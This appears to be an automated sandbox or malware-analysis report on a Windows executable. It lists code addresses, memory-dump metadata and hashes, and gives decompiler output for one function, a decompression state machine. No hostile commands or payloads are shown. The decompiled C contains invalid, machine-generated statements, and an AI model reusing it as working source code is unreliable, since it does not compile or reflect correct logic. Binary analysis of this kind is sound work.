                                            0x00000000
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406ced
                                            0x00406cf0
                                            0x00406cf3
                                            0x00406cfd
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x00406ce8
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00406d23
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x004069be
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x00000000
                                            0x0040712f
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x004069e3
                                            0x004069e3
                                            0x004069e6
                                            0x004069e9
                                            0x00000000
                                            0x00000000
                                            0x004069ef
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a26
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a59
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6c
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a77
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406abf
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aea
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406aef
                                            0x00406af6
                                            0x00406af9
                                            0x00000000
                                            0x00406afb
                                            0x00000000
                                            0x00406afb
                                            0x00406af9
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00406b00
                                            0x00000000
                                            0x00000000
                                            0x00406b3b
                                            0x00406b3b
                                            0x00406b3f
                                            0x00407147
                                            0x00000000
                                            0x00407147
                                            0x00406b45
                                            0x00406b48
                                            0x00406b4b
                                            0x00406b4f
                                            0x00406b52
                                            0x00406b58
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5a
                                            0x00406b5d
                                            0x00406b60
                                            0x00406b60
                                            0x00406b66
                                            0x00406b04
                                            0x00406b04
                                            0x00406b07
                                            0x00000000
                                            0x00406b07
                                            0x00406b68
                                            0x00406b68
                                            0x00406b6b
                                            0x00406b6e
                                            0x00406b71
                                            0x00406b74
                                            0x00406b77
                                            0x00406b7a
                                            0x00406b7d
                                            0x00406b80
                                            0x00406b83
                                            0x00406b86
                                            0x00406b9e
                                            0x00406ba1
                                            0x00406ba4
                                            0x00406ba7
                                            0x00406ba7
                                            0x00406baa
                                            0x00406bae
                                            0x00406bb0
                                            0x00406b88
                                            0x00406b88
                                            0x00406b90
                                            0x00406b95
                                            0x00406b97
                                            0x00406b99
                                            0x00406b99
                                            0x00406bb3
                                            0x00406bba
                                            0x00406bbd
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406bbf
                                            0x00000000
                                            0x00406e4c
                                            0x00406e4c
                                            0x00406e50
                                            0x00407177
                                            0x00000000
                                            0x00407177
                                            0x00406e56
                                            0x00406e59
                                            0x00406e5c
                                            0x00406e60
                                            0x00406e63
                                            0x00406e69
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6b
                                            0x00406e6e
                                            0x00000000
                                            0x00000000
                                            0x00406c1c
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00000000
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f81
                                            0x00406f84
                                            0x00406f8e
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6b
                                            0x00406f6e
                                            0x00000000
                                            0x00000000
                                            0x00407018
                                            0x0040701c
                                            0x0040703a
                                            0x0040703a
                                            0x0040703a
                                            0x00407041
                                            0x00407048
                                            0x0040704f
                                            0x0040704f
                                            0x00000000
                                            0x0040704f
                                            0x0040701e
                                            0x00407021
                                            0x00407024
                                            0x00407027
                                            0x0040702e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x00000000
                                            0x00000000
                                            0x00407109
                                            0x0040710c
                                            0x0040700d
                                            0x00000000
                                            0x00000000
                                            0x00406d43
                                            0x00406d45
                                            0x00406d4c
                                            0x00406d4d
                                            0x00406d4f
                                            0x00406d52
                                            0x00000000
                                            0x00000000
                                            0x00406d5a
                                            0x00406d5d
                                            0x00406d60
                                            0x00406d62
                                            0x00406d64
                                            0x00406d64
                                            0x00406d65
                                            0x00406d68
                                            0x00406d6f
                                            0x00406d72
                                            0x00406d80
                                            0x00000000
                                            0x00000000
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x00000000
                                            0x00000000
                                            0x00407065
                                            0x00407065
                                            0x00407069
                                            0x004071a1
                                            0x00000000
                                            0x004071a1
                                            0x0040706f
                                            0x00407072
                                            0x00407075
                                            0x00407079
                                            0x0040707c
                                            0x00407082
                                            0x00407084
                                            0x00407084
                                            0x00407084
                                            0x00407087
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708a
                                            0x0040708d
                                            0x0040708d
                                            0x00407091
                                            0x004070f1
                                            0x004070f4
                                            0x004070f9
                                            0x004070fa
                                            0x004070fc
                                            0x004070fe
                                            0x00407101
                                            0x0040700d
                                            0x0040700d
                                            0x00000000
                                            0x00407013
                                            0x0040700d
                                            0x00407093
                                            0x00407099
                                            0x0040709c
                                            0x0040709f
                                            0x004070a2
                                            0x004070a5
                                            0x004070a8
                                            0x004070ab
                                            0x004070ae
                                            0x004070b1
                                            0x004070b4
                                            0x004070cd
                                            0x004070d0
                                            0x004070d3
                                            0x004070d6
                                            0x004070da
                                            0x004070dc
                                            0x004070dc
                                            0x004070dd
                                            0x004070e0
                                            0x004070b6
                                            0x004070b6
                                            0x004070be
                                            0x004070c3
                                            0x004070c5
                                            0x004070c8
                                            0x004070c8
                                            0x004070e3
                                            0x004070ea
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00406cd0
                                            0x00406cd0
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x00406f54
                                            0x00407189
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x004071c0
                                            0x004071c0
                                            0x00000000
                                            0x004071c0
                                            0x0040700d
                                            0x00406f94
                                            0x00406f91
                                            0x00000000
                                            0x00406bc8

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                            • Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
                                            • Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
                                            • Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
